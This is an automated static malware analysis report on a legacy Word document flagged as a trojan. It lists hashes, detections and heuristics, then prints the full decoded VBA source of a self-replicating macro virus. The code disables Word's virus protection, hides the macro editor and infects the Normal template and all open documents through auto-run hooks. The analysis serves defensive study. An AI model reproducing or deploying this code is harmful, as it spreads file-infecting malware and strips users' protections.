Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42eb2e0a3f65b6e5…

MALICIOUS

Office (OLE)

44.5 KB Created: 1999-12-29 05:11:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 5d2dc7c8cf6282826461b15649ef40d0 SHA-1: ee0bf1018045e10c94db9cbb95b274ca45355a06 SHA-256: 42eb2e0a3f65b6e5d37cd788d04ed9f2a242678acf83ca83c75951aeec5c4d36
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including AutoOpen and AutoClose, which are commonly used to execute malicious code upon document opening or closing. The macros attempt to disable security features like 'VirusProtection' and remove menu items, indicating an intent to hinder detection and user awareness. The presence of legacy WordBasic markers and the ClamAV detections 'Win.Trojan.Pivis-2' and 'Doc.Trojan.Opey-13' further support a malicious classification.

Heuristics 5

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3916 bytes
SHA-256: 7d1caf30e6c56bebd6cb5cb631dea2539958aa1637da6579b1dc149977ca19ca
Detection
ClamAV: Doc.Trojan.Opey-13
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AstecCTL"
' This Virus was creted to test the infection routine
Sub AstecVx()
  On Error Resume Next
    On Error Resume Next
    Application.UserName = "xHeCS"
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "xHeCS"
        .Execute
    End With
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    With ActiveDocument
        .ReadOnlyRecommended = False
    End With
    On Error Resume Next
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    CommandBars("Tools").Controls("Macro").Delete
    CommandBars("Tools").Controls("Customize...").Delete
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    NTInfected = False
        For i = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
            clan = NormalTemplate.VBProject.VBComponents(i).Name
                If clan = "AstecCTL" Then NTInfected = True
                If (clan <> "AstecCTL") And (clan <> "ThisDocument") Then Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=clan, Object:=wdOrganizerObjectProjectItems
        Next i
        For Each opendoc In Documents
            ODInfected = False
            With opendoc
                For J = opendoc.VBProject.VBComponents.Count To 1 Step -1
                clan = opendoc.VBProject.VBComponents(J).Name
                    If clan = "AstecCTL" Then ODInfected = True
                    If (clan <> "AstecCTL") And (clan <> "ThisDocument") And (clan <> "Reference to Normal") Then Application.OrganizerDelete Source:=opendoc.FullName, Name:=clan, Object:=wdOrganizerObjectProjectItems
                Next J
                If ODInfected = False Then
                    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=opendoc.FullName, Name:="AstecCTL", Object:=wdOrganizerObjectProjectItems
                    opendoc.SaveAs FileName:=opendoc.FullName
                End If
            End With
        Next opendoc
            If NTInfected = False Then
                Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="AstecCTL", Object:=wdOrganizerObjectProjectItems
                NormalTemplate.Save
            End If
If (Day(Date) = 7) Then
          MsgBox " Bats Virus Version 1.0 by (C)2000 xHeCS ", vbCritical
End If
End Sub
Sub FileSave()
    On Error Resume Next
    Call AstecVx
    ActiveDocument.Save
End Sub
Sub FileClose()
    On Error Resume Next
    Call AstecVx
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ActiveDocument.Close
End Sub
Sub FileExit()
    On Error Resume Next
    Call AstecVx
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.quit
End Sub
Sub FileNew()
    On Error Resume Next
    Dialogs(wdDialogFileNew).Show
    newfile$ = 1
    Call AstecVx
End Sub
Sub AutoOpen()
    On Error Resume Next
    Call AstecVx
End Sub
Sub AutoExec()
    On Error Resume Next
    Call AstecVx
End Sub
Sub AutoClose()
    On Error Resume Next
    Call AstecVx
End Sub
Sub FileSaveAs()
    On Error Resume Next
    Call AstecVx
    Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileOpen()
    On Error Resume Next
    Dialogs(wdDialogFileOpen).Show
    Call AstecVx
End Sub